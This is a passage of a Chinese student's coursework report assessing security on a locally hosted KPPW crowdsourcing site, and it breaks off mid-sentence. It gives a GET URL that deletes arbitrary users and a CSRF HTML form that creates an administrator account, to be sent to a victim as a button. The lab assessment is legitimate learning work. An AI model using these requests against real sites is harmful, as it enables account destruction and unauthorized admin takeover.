网络安全风险评估大作业.doc

南阳理工学院 网络安全风险评估大作业 班 级： 13级网安四班 姓 名： 彭克杰 学 号： 1315935027 指导老师： 林玉香 2016.5.18 网络安全评估目的：网络平台安全泛指操作系统和通用基础服务安全，主要用于防范黑客攻击手段。目前市场上大多数安全产品均具有局限安全性，我们可以通用信息安全评估准则为依据来对其进行评估，来发现问题，修复问题，确定网络平台安全实施。 安全弱点和信息资产紧密相连，它可能被威胁利用、引起资产损失或伤害。但是，安全弱点本身不会造成损失，它只是一种条件或环境、可能导致被威胁利用而造成资产损失。安全弱点的出现有各种原因，例如可能是软件开发过程中的质量问题，也可能是系统管理员配置方面的，也可能是管理方面的。但是，它们的共同特性就是给攻击者提供了对主机系统或者其他信息系统攻击的机会。 因此，我们对网络产品，网络平台等进行一系列的风险评估很是必要，下面我们就对一个具体的网站进行安全方面的漏洞评估。 评估内容： 在本次实验中我们借助phpstudy搭建一个威客系统网站，进行实际渗透测试和评估。 扫描工具：Burpsuite，Nikto，WebScarab，扫描工具有很多，选个合适的就行。 这是发现的一些漏洞： 1.删除任意帐号/添加管理员 详细说明： http://localhost/KPPW/index.php?do=userview=messageop=send http://localhost/KPPW/index.php?do=pubtaskid=1step=step2 收件人填目标用户名 ，标题没有特定要求，内容没有转义，不过过滤了敏感标签和 onerror onload等事件。 任意删除账号： http://localhost/KPPW/admin/index.php?do=userview=listop=deledituid=5529 GET提交此URL 就会删除ID为 “5529”的用户 edituid=fds[username]=qianlanfds[truename]=fds[phone]=fds[qq]=fds[indus_pid]=fds[indus_id]=fds[birthday]=fds[password]=111111fds[email]=x@q.cfds[group_id]=1is_submit=1 然后构造一个表单： Code区域： form action=http://localhost/KPPW/admin/index.php?do=userview=addedituid= method=post input type=hidden name=edituid value= input type=hidden name=fds[username] value=qianlan input type=hidden name=fds[truename] value= input type=hidden name=fds[phone] value= input type=hidden name=fds[qq] value= input type=hidden name=fds[indus_pid] value= input type=hidden name=fds[indus_id] value= input type=hidden name=fds[birthday] value= input type=hidden name=fds[password] value=123456 input type=hidden name=fds[email] value=x@q.c input type=hidden name=fds[group_id] value=1 input type=submit name=is_submit value=1 /form 其他比较敏感的都隐藏起来。 因为script 标签被过滤。 不能自动提交。 所以放出来个按钮，发给人家一